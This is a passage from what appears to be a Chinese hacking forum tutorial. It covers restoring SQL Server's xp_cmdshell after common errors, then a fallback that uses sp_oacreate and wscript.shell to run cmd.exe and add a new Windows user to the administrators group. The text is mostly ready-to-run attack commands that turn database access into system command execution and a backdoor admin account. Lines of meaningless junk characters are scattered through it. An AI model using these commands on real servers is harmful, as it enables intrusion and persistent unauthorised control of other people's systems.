三.常见情况恢复执行xp_cmdshell.

% g7 Y. j7 l; T: p
1 未能找到存储过程'master..xpcmdshell'.
% F1 ~! ]! I/ {/ R   恢复方法：查询分离器连接后,
: i# B% G4 {7 `: ^第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
5 |3 Q6 R4 r+ l7 D- }( a+ L
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
! M# w/ z, L( _% k( b- Z% B1 z恢复方法：查询分离器连接后,
第一步执行：sp_dropextendedproc "xp_cmdshell"
6 ?" a2 T) H$ B第二步执行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& W; T- K  X7 q- D) f9 y6 _) U6 ?* R然后按F5键命令执行完毕

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
: ^/ h2 d8 C9 j# f1 T) H恢复方法：查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
4 q; w( {9 {& J$ n第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
( \2 g- d9 K# H8 C; P$ H. B然后按F5键命令执行完毕
; D5 w* K0 a7 k1 j5 J% w. t
& E4 n9 m1 Z! J( G3 B四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
$ I0 {# c; Q$ g3 J, D' e+ i2000servser系统:
; w% z2 I0 j( @4 \declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'

4 O* X7 L& q2 r: d0 E0 R. E0 udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
0 R, h3 t7 ~5 J' |  c
xp或2003server系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
$ N7 j' U. X- P7 ~: j3 D5 P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# H  {4 V: E% I7 |1 O3 O" {( v